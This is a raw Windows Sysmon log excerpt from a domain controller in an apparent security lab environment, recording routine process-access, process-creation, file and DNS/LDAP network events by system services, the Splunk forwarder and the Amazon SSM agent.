12:01:06.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.212{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.212{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.212{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6400-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.212{266CAFBE-647E-6064-4300-00000000AE01}39243892C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-6482-6064-6400-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.212{266CAFBE-6482-6064-6400-00000000AE01}4072C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get OperatingSystemSKU /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 23542300x80000000000000002696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.188{266CAFBE-6481-6064-6100-00000000AE01}3848NT 
AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.080{266CAFBE-647D-6064-2F00-00000000AE01}2796NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\composite.xmlMD5=BAA3D9652166DC4163F7323B34F168FA,SHA256=0A1E4AAE2B282671AA08BBBF61D7B1808B52B350A12845444CD028CBDBBDA44D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.653{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54715- 354300x80000000000000002693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.653{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56179- 354300x80000000000000002692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.050{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49696-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000002691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.050{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT 
AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49696-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000002690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.730{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local64876- 10341000x80000000000000002689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6300-00000000AE01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000002687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6300-00000000AE01}3844C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-6482-6064-6200-00000000AE01}40204008C:\Windows\system32\cmd.exe{266CAFBE-6482-6064-6300-00000000AE01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.042{266CAFBE-6482-6064-6300-00000000AE01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-6482-6064-6200-00000000AE01}4020C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000002676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.033{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6200-00000000AE01}4020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
